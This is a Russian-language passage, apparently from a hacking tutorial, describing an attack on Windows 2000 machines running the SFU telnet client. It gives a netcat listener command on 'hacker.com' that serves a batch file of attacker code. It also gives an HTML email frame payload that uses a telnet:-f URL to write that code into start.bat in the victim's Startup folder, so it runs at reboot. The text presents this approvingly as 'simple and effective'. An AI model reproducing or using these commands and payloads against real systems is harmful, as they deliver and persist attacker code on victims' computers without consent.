Открытие исходящих клиентских соединений

Эта технология уже использовалась в атаке, основанной на отправке и запуске на компьютере-жертве активного кода во вложении - как вы помните, на хакерском компьютере была запущена программа-клиент, ожидающая подключения со стороны атакованного компьютера

Другая разновидность атаки подобного рода также основана на запуске на хакерском компьютере по адресу, скажем, hacker.com, программы netcat в режиме ожидания:

nc -n -L -p 80 -t -w 1 < attack.bat

Эта команда заставляет программу netcat ожидать подключения TCP к порту 80, после чего на подключившися компьютер отправляется конвейеризованный файл attack.bat с хакерским кодом. А чтобы заставить атакованный компьтер подключиться к клиенту netcat, ему отсылается письмо с активным вложением в виде кода HTML, содержащего такой фрейм:

<frame src=telnet:-f

%20"Document%20and%20Setting\aAll%20\Users\start%20menu\programs\startup\

start.bat"%20hacker.com%2080 >

Как только получатель откроет письмо, фрейм попытается загрузить данные из источниа, указанногоссылкой на хакрский сайт. Для этого ему потребуется содать соединение по протоколу telnet, выполняемое клиентом telnet, но не стандартного, поставляемого вместе с Windows 2000, а входящего в состав пакета SFU 2.0 (Service for Unix - службы для Unix). Это следует из наличия параметра f:, который отсутствует у стандартного клиента telnet.

Клиент telnet из пакета SFU имеет следующее свойство: указание в строке Адрес (Address) браузера IE URL telnet:-f%20\filename.txt%20 host заставляет браузер IE подсоединиться к указанному хосту и зафиксировать процесс подключения вжурнале сеанса - файле filename.txt. Атакованный компьютер, послав запрос на соединение по протоколу telnet с хакерским компьютером, вместе со всем прочим записывает в журнальный файл start.bat сеанса связи хакерский код из файла attck.bat. Далее start.bat сохраняется в папке автозагрузки и исполняется при перезапуске компьютера - все очень просто и эффективно!

Для такой атаки имеется только одно условие - наличие на атакуемом компьютере клиента telnet из пакета SFU 2.0, что уменьшает ценность такой технологии хакинга. Однако надо думать, она будет развиваться и дальше, и приведет к вполне приемлемым для практики результатам.